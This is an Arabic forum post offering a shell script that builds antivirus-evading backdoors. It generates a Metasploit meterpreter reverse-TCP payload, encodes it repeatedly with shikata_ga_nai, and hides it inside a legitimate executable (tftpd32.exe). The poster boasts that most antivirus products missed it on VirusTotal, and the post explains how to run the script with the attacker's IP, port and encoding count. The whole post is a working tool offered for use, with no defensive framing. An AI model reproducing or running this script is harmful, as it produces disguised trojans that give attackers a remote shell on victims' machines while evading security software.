بسم الله الرحمن الرحيم
سكربت جميل وسهل لصنع باكدوور مشفر عن برامج مضادات الفيروسات ويتميز أنه يتيح لك تشفير الباكدوور أكثر من مرّة لإخفاءه أكثر!
جربت فحص الباكدوور المشفر في موقع
VirusTotal وأظهر نتائج مرضيه فلم يكتشفه أغلب برامج مضادات الفيروسات مثل كاسبرسكي وأفاست و AVG والنود32 ومكافي وسيمانتيك!!
كود PHP:
#!/bin/sh
# (C)opyright 2010 - pigtail23
# AVbypass Creator v. 1.0 (2010-06-06)
#msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x -->>> /pentest/windows-binaries/tools/tftpd32.exe <<<-- -t exe > $4$c.exe
#/pentest/windows-binaries/tools/tftpd32.exe <--- you can use a file of your choise
echo "sh avbypass.sh <IP> <Port> <Number of times to encode> <Filename>"
if [[ $1 ]]; then echo "IP:" $1 ; else echo "IP not set"; exit 0; fi
if [[ $2 ]]; then echo "Port:" $2 ; else echo "Port not set"; exit 0; fi
if [[ $3 ]]; then echo "Number:" $3 ; else echo "Set Number"; exit 0; fi
if [[ $4 ]]; then echo "Filename:" $4 ; else echo "Set Filename"; exit 0; fi
echo "File/-s creating. Pls Wait..."
for (( c=1; c<=$3; c++ ))
do
msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x /pentest/windows-binaries/tools/tftpd32.exe -t exe > $4$c.exe
echo "File" $4$c".exe was created."
done[center][right][/right][/center]
يمكنك تحميل السكربت من
هناشغله بواسطة الأمر:
sh encoder.sh 192.168.x.x 2222 4 /root/SBD
192.168.x.x=آي بي المخترِق
2222=المنفذ الذي سيتم الاتصال منه
4=عدد مرات التشفير
/root/SBD=المسار الذي سيتم صنع الباكدور فيه و اسم الباكدوور
Secure BackDoor Maker